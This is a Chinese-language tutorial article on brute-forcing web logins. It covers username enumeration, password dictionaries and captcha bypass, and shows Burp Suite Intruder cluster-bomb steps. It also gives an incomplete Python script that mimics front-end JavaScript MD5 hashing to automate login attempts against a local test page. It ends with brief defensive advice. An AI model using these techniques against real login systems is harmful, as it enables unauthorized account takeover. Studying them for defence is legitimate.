浅析web暴力猜解.pdf

### 浅析Web暴力猜解 #### 一、前言 随着互联网的快速发展，Web应用程序已成为企业业务的重要组成部分。然而，这也使得Web应用程序成为黑客攻击的主要目标之一。针对Web应用程序的攻击手段众多，其中暴力猜解（Brute Force Attack）是一种常见的攻击方式，通过尝试大量的可能组合来破解登录凭证或其他敏感信息。本文将对Web暴力猜解的基本原理、常见场景以及防范措施进行深入探讨。 #### 二、暴力猜解的思路与实施 ##### 2.1 基本思路 暴力猜解通常涉及到三个关键元素：用户名、密码及验证码。其基本思路如下： 1. **获取用户名**：这一步可以通过登录错误提示、网站文章编辑落款、社会工程学等方式来完成。 2. **猜解密码**：一个有效的字典是猜解密码的基础，字典中包含了大量的常用密码组合。 3. **验证码识别或绕过**：常见的方法包括验证码与用户名密码分离、验证码不能自动刷新可重复使用、验证码识别等。 ##### 2.2 按照HTTP传递数据的方式分类 暴力猜解可以大致分为两种类型： 1. **明文传输没有验证码**：这是最简单的场景，只需用户名和密码即可进行暴力猜解。通常使用Burp Suite Intruder等工具来实现。 2. **前端JS加密处理**：为了增加安全性，许多Web应用会在客户端对密码进行加密后再发送至服务器端。这种情况下，暴力猜解的难度会相应提高。 #### 三、JS加密爆破 在实际操作中，如果遇到前端使用JavaScript对密码进行加密的情况，我们可以采取以下两种策略： 1. **利用Burp Suite Intruder**：抓取包含加密密码的数据包并将其发送到Intruder模块。接着，选择合适的爆破模式（例如“Cluster bomb”），并在设置时指定密码字段的加密方式（如MD5）。开始爆破，通过返回的字段长度判断是否成功。 - **步骤示例**： 1. 抓包并发送到Intruder。 2. 标记相关参数。 3. 选择第四种模式“Cluster bomb”。 4. 分别选择用户名字典和密码字典。 5. 设置密码字典时选择MD5加密方式。 6. 开始爆破。 7. 根据返回字段长度判断是否成功。 2. **使用PyExecJS**：这是一种通过Python脚本来模拟前端加密过程的方法。具体步骤如下： - **环境搭建**： 1. 安装PyExecJS库。 2. 下载并安装phantomjs。 - **编写脚本**： 1. 使用`execjs`库读取并编译JavaScript加密函数。 2. 编写爆破逻辑，通过调用加密函数处理密码字段。 3. 发送POST请求进行登录尝试。 - **脚本示例**： ```python #!/usr/bin/env python # coding:utf-8 import requests import threadpool from selenium import webdriver import execjs def getpass(str): with open('md5.js', 'r') as js: source = js.read() phantom = execjs.get('PhantomJS') getpass = phantom.compile(source) password = getpass.call('hex_md5', str) return password def login(user, passwd): url = "http://127.0.0.1/login.php" payload = {'username': user, 'password': getpass(passwd)} headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64;rv:55.0) Gecko/20100101 Firefox/55.0'} try: response = requests.post(url, data=payload, headers=headers, timeout=5) result = response.content if result.count('fail') < 1: print('[success] ' + url + ':' + user + ':' + passwd) def getLines(file_name): list = [] with open(file_name, 'r') as fd: for line in fd.readlines(): line = line.strip() if not len(line) or line.startswith('#'): continue list.append(line) ``` #### 四、总结 通过对Web暴力猜解的分析，我们了解到这是一种相对简单但效率较高的攻击手段。它不仅适用于登录界面，还可以扩展到其他需要验证的地方。为了防止这类攻击，开发人员应加强用户输入验证、限制登录失败次数、使用更复杂的加密算法等措施。同时，定期更新密码和加强安全意识也是用户保护自身账户安全的有效途径。